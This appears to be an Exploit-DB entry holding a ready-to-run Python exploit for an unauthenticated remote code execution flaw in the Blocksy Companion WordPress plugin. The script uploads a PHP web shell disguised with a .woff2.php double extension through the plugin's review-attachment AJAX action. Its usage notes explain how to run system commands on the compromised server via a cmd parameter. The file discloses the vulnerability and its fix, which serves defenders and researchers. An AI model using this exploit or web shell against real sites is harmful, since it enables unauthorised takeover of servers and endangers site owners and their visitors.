Blocksy Companion 2.1.46 - RCE

EDB-ID:

52640


Author:

banyamer

Type:

webapps


Platform:

Multiple

Date:

2026-08-11


#!/usr/bin/env python3
# Exploit Title:        Blocksy Companion 2.1.46 - RCE
# CVE:                  CVE-2026-58480
# Date:                 2026-07-13
# Exploit Author:       Mohammed Idrees Banyamer
# Author Country:       Jordan
# Instagram:            @banyamer_security
# Author GitHub:        https://github.com/mbanyamer
# Author Blog  :        https://banyamersecurity.com/blog/
# Vendor Homepage:      https://creativethemes.com
# Software Link:        https://wordpress.org/plugins/blocksy-companion/
# Affected:             Blocksy Companion <= 2.1.46 (Pro with Advanced Reviews + Custom Fonts)
# Tested on:            WordPress + Blocksy Companion 2.1.46
# Category:             WebApps
# Platform:             PHP
# Exploit Type:         Remote Code Execution (Unauthenticated)
# CVSS:                 9.8 (Critical)
# Description:          Unauthenticated arbitrary file upload via blc-review-images[] parameter in save_attachments.
#                       Double-extension bypass (.woff2.php) due to strpos() check in Custom Fonts extension.
# Fixed in:             2.1.47
# Usage:
#   python3 exploit.py <target_url>
#
# Examples:
#   python3 exploit.py http://target.com
#
# Notes:
#   • Requires Advanced Reviews and Custom Fonts extensions enabled.
#   • Uploaded shell lands in wp-content/uploads/ (check response for exact path).
#
# How to Use
#
# Step 1:
#   Run the script with target URL.
#
# Step 2:
#   Use the generated shell URL with ?cmd=command (e.g. ?cmd=id)

import requests
import sys

def banner():
    print(r"""
╔██████╗  █████╗ ███╗   ██╗██╗   ██╗ █████╗ ███╗   ███╗███████╗██████╗╗
║██╔══██╗██╔══██╗████╗  ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║
║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗  ██████╔╝
║██╔══██╗██╔══██║██║╚██╗██║  ╚██╔╝  ██╔══██║██║╚██╔╝██║██╔══╝  ██╔══██╗
║██████╔╝██║  ██║██║ ╚████║   ██║   ██║  ██║██║ ╚═╝ ██║███████╗██║  ██║
╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝  ╚═╝╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝
        ╔═╗ Banyamer Security ╔═╗
""")

if len(sys.argv) < 2:
    banner()
    print("Usage: python3 exploit.py <http://target.com>")
    sys.exit(1)

banner()

target = sys.argv[1].rstrip('/')
shell_name = "poc.woff2.php"
payload = """<?php
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
    exit;
}
echo 'Blocksy RCE PoC - CVE-2026-58480 | @banyamer_security';
?>
"""

files = {
    'blc-review-images[]': (shell_name, payload, 'application/octet-stream')
}

data = {
    'action': 'blc_save_review_attachments'
}

print("[+] Sending unauthenticated file upload...")
try:
    r = requests.post(f"{target}/wp-admin/admin-ajax.php", files=files, data=data, timeout=15)
    print(f"Status: {r.status_code}")
    print(r.text[:600])
    print("\n[+] If successful, check wp-content/uploads/ for the shell.")
    print(f"[+] Example: {target}/wp-content/uploads/YEAR/MONTH/{shell_name}?cmd=id")
except Exception as e:
    print(f"[-] Error: {e}")